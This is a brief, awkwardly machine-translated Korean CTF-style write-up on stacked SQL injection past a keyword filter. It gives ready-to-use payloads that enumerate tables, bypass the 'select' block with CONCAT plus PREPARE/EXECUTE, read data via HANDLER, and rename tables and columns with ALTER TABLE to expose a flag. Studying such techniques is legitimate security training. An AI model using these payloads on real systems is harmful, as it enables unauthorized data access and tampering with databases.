각종 ql 주입 회전 자세
776 단어 sql 주입
select|update|delete|drop|insert|where
스택 주입을 사용하여 존재하는 라이브러리, 테이블, 열의 값을 먼저 조회하기-1';show tables;#-1';show columns from tables;#
다음은 표 안의 구체적인 데이터 방법을 조사한다. 첫째, mysql의 예처리-1'을 이용한다.set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#mysql은 대소문자에 민감하지 않습니다
방법2:handler를 이용하기;handler `1919810931114514` open;handler `1919810931114514` read first;#
방법3: 검색할 표를 페이지에서 검색할 표 1로 바꾸기;alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#원문: https://www.cnblogs.com/joker...